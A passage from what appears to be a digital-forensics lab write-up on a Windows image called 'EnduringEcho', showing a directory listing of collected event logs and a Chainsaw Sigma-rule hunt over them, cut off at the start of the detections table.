&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; S-1-5-21-3871582759-1638593395-315824688-1002_UserData.bin
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; S-1-5-21-3871582759-1638593395-315824688-500_UserData.bin
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; LogFiles
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; BootPerfDiagLogger.etl
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; ShutdownPerfDiagLogger.etl
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; WdiContextLog.etl.001
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; WdiContextLog.etl.002
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; WdiContextLog.etl.003
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; winevt
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; logs
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Application.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Client-Licensing-Platform%4Admin.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-AAD%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-AppModel-Runtime%4Admin.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-AppReadiness%4Admin.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-AppReadiness%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-AppXDeployment%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-AppXDeploymentServer%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-AppxPackaging%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-Authentication User Interface%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-Biometrics%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-BitLocker%4BitLocker Management.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-Bits-Client%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-CloudStore%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-CodeIntegrity%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-Containers-BindFlt%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-Containers-Wcifs%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-Crypto-DPAPI%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-Crypto-NCrypt%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-DeviceSetupManager%4Admin.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-DeviceSetupManager%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-Dhcp-Client%4Admin.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-Dhcpv6-Client%4Admin.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-Diagnosis-DPS%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-Diagnosis-Scheduled%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-Diagnosis-Scripted%4Admin.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-Diagnosis-Scripted%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-Diagnostics-Performance%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-DiskDiagnosticDataCollector%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-GroupPolicy%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-HelloForBusiness%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-IKE%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-Kernel-Boot%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-Kernel-EventTracing%4Admin.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-Kernel-PnP%4Configuration.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-Kernel-WHEA%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-Known Folders API Service.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-LanguagePackSetup%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-LiveId%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-ModernDeployment-Diagnostics-Provider%4Autopilot.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-ModernDeployment-Diagnostics-Provider%4ManagementService.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-MUI%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-NcdAutoSetup%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-NCSI%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-NetworkProfile%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-Ntfs%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-Ntfs%4WHC.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-Partition%4Diagnostic.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-PowerShell%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-Privacy-Auditing%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-Provisioning-Diagnostics-Provider%4Admin.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-PushNotification-Platform%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-ReadyBoost%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-RemoteDesktopServices-RdpCoreTS%4Admin.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-RemoteDesktopServices-RdpCoreTS%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-RemoteDesktopServices-SessionServices%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-Security-LessPrivilegedAppContainer%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-Security-Mitigations%4UserMode.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-Security-SPP-UX-Notifications%4ActionCenter.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-SettingSync%4Debug.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-ShellCommon-StartLayoutPopulation%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-Shell-Core%4AppDefaults.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-Shell-Core%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-SmartCard-DeviceEnum%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-SmbClient%4Connectivity.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-SmbClient%4Security.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-SMBServer%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-StateRepository%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-Storage-ClassPnP%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-Storage-Storport%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-Store%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-Storsvc%4Diagnostic.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-TaskScheduler%4Maintenance.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-TerminalServices-PnPDevices%4Admin.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-TerminalServices-PnPDevices%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-TerminalServices-ServerUSBDevices%4Admin.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-TerminalServices-ServerUSBDevices%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-Time-Service%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-TWinUI%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-TZSync%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-UniversalTelemetryClient%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-User Device Registration%4Admin.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-UserPnp%4DeviceInstall.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-User Profile Service%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-Wcmsvc%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-WebAuthN%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-WER-PayloadHealth%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-WFP%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-Windows Defender%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-WindowsSystemAssessmentTool%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-WindowsUpdateClient%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-Winlogon%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-WinRM%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Microsoft-Windows-WMI-Activity%4Operational.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Security.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Setup.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; System.evtx
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9492;&#9472;&#9472; Windows PowerShell.evtx
&#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; Temp
&#9474;&nbsp;&nbsp;         &#9492;&#9472;&#9472; MpCmdRun.log
&#9492;&#9472;&#9472; EnduringEcho.zip

892 directories, 2993 files</code></pre></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ tree -la -L2 
.
&#9500;&#9472;&#9472; 2025-08-25T20_20_59_5246365_ConsoleLog.txt
&#9500;&#9472;&#9472; 2025-08-25T20_20_59_5246365_CopyLog.csv
&#9500;&#9472;&#9472; 2025-08-25T20_20_59_5246365_SkipLog.csv.csv
&#9492;&#9472;&#9472; C
    &#9500;&#9472;&#9472; $Boot
    &#9500;&#9472;&#9472; $Extend
    &#9500;&#9472;&#9472; $LogFile
    &#9500;&#9472;&#9472; $MFT
    &#9500;&#9472;&#9472; $Secure_$SDS
    &#9500;&#9472;&#9472; ProgramData
    &#9500;&#9472;&#9472; Users
    &#9492;&#9472;&#9472; Windows

6 directories, 7 files</code></pre></div><p>Let&#8217;s hunt the first Windows Event Logs:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo chainsaw hunt -r rules -s sigma --mapping sigma-event-logs-all.yml C/Windows/System32/winevt/logs/ --skip-errors

 &#9608;&#9608;&#9608;&#9608;&#9608;&#9608;&#9559;&#9608;&#9608;&#9559;  &#9608;&#9608;&#9559; &#9608;&#9608;&#9608;&#9608;&#9608;&#9559; &#9608;&#9608;&#9559;&#9608;&#9608;&#9608;&#9559;   &#9608;&#9608;&#9559;&#9608;&#9608;&#9608;&#9608;&#9608;&#9608;&#9608;&#9559; &#9608;&#9608;&#9608;&#9608;&#9608;&#9559; &#9608;&#9608;&#9559;    &#9608;&#9608;&#9559;
&#9608;&#9608;&#9556;&#9552;&#9552;&#9552;&#9552;&#9565;&#9608;&#9608;&#9553;  &#9608;&#9608;&#9553;&#9608;&#9608;&#9556;&#9552;&#9552;&#9608;&#9608;&#9559;&#9608;&#9608;&#9553;&#9608;&#9608;&#9608;&#9608;&#9559;  &#9608;&#9608;&#9553;&#9608;&#9608;&#9556;&#9552;&#9552;&#9552;&#9552;&#9565;&#9608;&#9608;&#9556;&#9552;&#9552;&#9608;&#9608;&#9559;&#9608;&#9608;&#9553;    &#9608;&#9608;&#9553;
&#9608;&#9608;&#9553;     &#9608;&#9608;&#9608;&#9608;&#9608;&#9608;&#9608;&#9553;&#9608;&#9608;&#9608;&#9608;&#9608;&#9608;&#9608;&#9553;&#9608;&#9608;&#9553;&#9608;&#9608;&#9556;&#9608;&#9608;&#9559; &#9608;&#9608;&#9553;&#9608;&#9608;&#9608;&#9608;&#9608;&#9608;&#9608;&#9559;&#9608;&#9608;&#9608;&#9608;&#9608;&#9608;&#9608;&#9553;&#9608;&#9608;&#9553; &#9608;&#9559; &#9608;&#9608;&#9553;
&#9608;&#9608;&#9553;     &#9608;&#9608;&#9556;&#9552;&#9552;&#9608;&#9608;&#9553;&#9608;&#9608;&#9556;&#9552;&#9552;&#9608;&#9608;&#9553;&#9608;&#9608;&#9553;&#9608;&#9608;&#9553;&#9562;&#9608;&#9608;&#9559;&#9608;&#9608;&#9553;&#9562;&#9552;&#9552;&#9552;&#9552;&#9608;&#9608;&#9553;&#9608;&#9608;&#9556;&#9552;&#9552;&#9608;&#9608;&#9553;&#9608;&#9608;&#9553;&#9608;&#9608;&#9608;&#9559;&#9608;&#9608;&#9553;
&#9562;&#9608;&#9608;&#9608;&#9608;&#9608;&#9608;&#9559;&#9608;&#9608;&#9553;  &#9608;&#9608;&#9553;&#9608;&#9608;&#9553;  &#9608;&#9608;&#9553;&#9608;&#9608;&#9553;&#9608;&#9608;&#9553; &#9562;&#9608;&#9608;&#9608;&#9608;&#9553;&#9608;&#9608;&#9608;&#9608;&#9608;&#9608;&#9608;&#9553;&#9608;&#9608;&#9553;  &#9608;&#9608;&#9553;&#9562;&#9608;&#9608;&#9608;&#9556;&#9608;&#9608;&#9608;&#9556;&#9565;
 &#9562;&#9552;&#9552;&#9552;&#9552;&#9552;&#9565;&#9562;&#9552;&#9565;  &#9562;&#9552;&#9565;&#9562;&#9552;&#9565;  &#9562;&#9552;&#9565;&#9562;&#9552;&#9565;&#9562;&#9552;&#9565;  &#9562;&#9552;&#9552;&#9552;&#9565;&#9562;&#9552;&#9552;&#9552;&#9552;&#9552;&#9552;&#9565;&#9562;&#9552;&#9565;  &#9562;&#9552;&#9565; &#9562;&#9552;&#9552;&#9565;&#9562;&#9552;&#9552;&#9565;
    By WithSecure Countercept (@FranticTyping, @AlexKornitzer)

[+] Loading detection rules from: 
[!] Loaded 3448 detection rules (3556 not loaded)
[+] Loading forensic artefacts from: C/Windows/System32/winevt/logs/ (extensions: .evt, .evtx)
[+] Loaded 111 forensic artefacts (78.0 MiB)
[+] Current Artifact: C/Windows/System32/winevt/logs/Security.evtx
[+] Hunting [=====&gt;----------------------------------] 14/111 &#10247; [00:00:06]                                                                                                                                                                   [!] failed to parse document 'C/Windows/System32/winevt/logs/Security.evtx' - An error occurred while trying to deserialize evtx stream. - use --skip-errors to continue...                                                                  
[+] Current Artifact: C/Windows/System32/winevt/logs/Windows PowerShell.evtx
[+] Hunting [=========&gt;------------------------------] 27/111 &#10292; [00:00:07]                                                                                                                                                                   [!] failed to parse document 'C/Windows/System32/winevt/logs/Windows PowerShell.evtx' - An error occurred while trying to deserialize evtx stream. - use --skip-errors to continue...                                                        
[+] Current Artifact: C/Windows/System32/winevt/logs/Microsoft-Windows-PowerShell%4Operational.evtx
[+] Hunting [=================&gt;----------------------] 48/111 &#10255; [00:00:08]                                                                                                                                                                   [!] failed to parse document 'C/Windows/System32/winevt/logs/Microsoft-Windows-PowerShell%4Operational.evtx' - An error occurred while trying to deserialize evtx stream. - use --skip-errors to continue...                                 
[+] Current Artifact: C/Windows/System32/winevt/logs/Microsoft-Windows-WMI-Activity%4Operational.evtx
[+] Hunting [========================================] 111/111   [00:00:11]                                                                                                                                                                  
[+] Group: Sigma                                                                                                                                                                                                                             
&#9484;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9516;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9516;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9516;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9516;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9516;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9516;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9516;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9488;
&#9474;      timestamp      &#9474;             detections              &#9474; count &#9474;     Event.System.Provider      &#9474; Event ID &#9474; Record ID &#9474;    Computer     &#9474;            Event Data            &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-04-21 10:47:33 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4647     &#9474; 586       &#9474; DESKTOP-8IRBDLK &#9474; TargetUserName: defaultuser0     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
